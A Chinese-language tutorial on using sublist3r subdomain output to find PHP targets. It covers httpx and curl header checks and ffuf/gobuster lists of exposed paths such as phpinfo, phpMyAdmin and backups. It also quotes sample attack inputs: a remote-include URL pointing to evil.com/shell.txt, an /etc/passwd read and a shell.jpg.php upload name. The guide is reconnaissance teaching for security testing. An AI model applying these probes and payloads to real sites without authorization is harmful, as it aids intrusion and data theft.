不能,sublist3r仅枚举子域名,不扫描PHP漏洞、不解析代码、不触发RCE/SQLi/LFI,输出仅为域名列表,后续需配合httpx、ffuf等工具识别PHP环境并验证路径。
sublist3r 能直接挖 PHP 漏洞吗?不能
sublist3r 本身只是子域名枚举工具,不扫描、不解析 PHP 代码,也不触发任何 PHP 漏洞(如 RCE、SQLi、LFI)。它输出的是一堆域名列表,后续是否含 PHP 资源、是否存在漏洞,得靠你手动或用其他工具跟进。
常见误解是:跑完 sublist3r → 看到 dev.example.com → 觉得“这是 PHP 站,肯定有洞”。实际可能只是 Nginx 静态页,或者 PHP 已禁用 eval、system,甚至根本没开 PHP-FPM。
- sublist3r 输出的是
domain,不是phpinfo.php或?id=1 - 它不探测端口、不识别 CMS、不分析响应头里的
X-Powered-By: PHP/8.1.2 - 它不处理重定向、JS 渲染页、API 路由等现代 Web 架构中的 PHP 入口点
怎么从 sublist3r 结果里高效找可测的 PHP 目标?
关键不是“枚举完就开扫”,而是快速筛选出「大概率运行 PHP 且暴露攻击面」的子域。重点看三类特征:
-
路径关键词:对 sublist3r 输出加
httpx -status-code -title,优先关注返回 200 且 title 含phpMyAdmin、phpinfo、install、wp-的; -
子域命名习惯:
dev、staging、test、backup、old这些环境更可能关掉 WAF、留调试接口、用弱密码; -
响应头线索:用
curl -I https://$domain | grep -i 'x-powered-by\|server',看到X-Powered-By: PHP或Server: Apache/2.4.52 (Ubuntu) PHP/8.1.2才值得深挖。
枚举后立刻扫 PHP 相关路径,别只扫 /robots.txt
sublist3r 给的是“面”,你得自己定“点”。PHP 项目常暴露以下高危路径,建议用 ffuf 或 gobuster 快速验证:
立即学习“PHP免费学习笔记(深入)”;
-
/phpinfo.php、/info.php、/test.php(泄露配置、开启危险函数) -
/phpmyadmin/、/pma/、/adminer.php(默认凭据、未授权访问) -
/backup/、/archive/、/old/(可能含.sql、.zip、.tar.gz泄露) -
/wp-content/、/wp-includes/(WordPress 环境下 LFI、插件漏洞入口)
别漏掉大小写和扩展名变体:/PHPINFO.PHP、/phpinfo.php.bak、/phpinfo.php~ —— 某些服务器会直接返回源码。
为什么扫出来一堆 200 却没洞?PHP 配置比你想象中保守
现代 PHP 默认禁用大量危险函数,disable_functions 常包含 system、exec、shell_exec、passthru、proc_open,即使拿到代码执行点也弹不出 shell。
还有几个容易被忽略的限制:
-
open_basedir开启时,file_get_contents('/etc/passwd')会报错,LFI 失效 -
allow_url_include = Off(默认)→?page=http://evil.com/shell.txt白试 - Web 服务器用
location ~ \.php$ { ... }精确匹配,上传shell.jpg.php会被当成静态文件返回源码,而非执行
所以看到 phpinfo.php 别急着欢呼,先 Ctrl+F 查 disable_functions 和 open_basedir —— 这两行决定你后面要不要换思路。
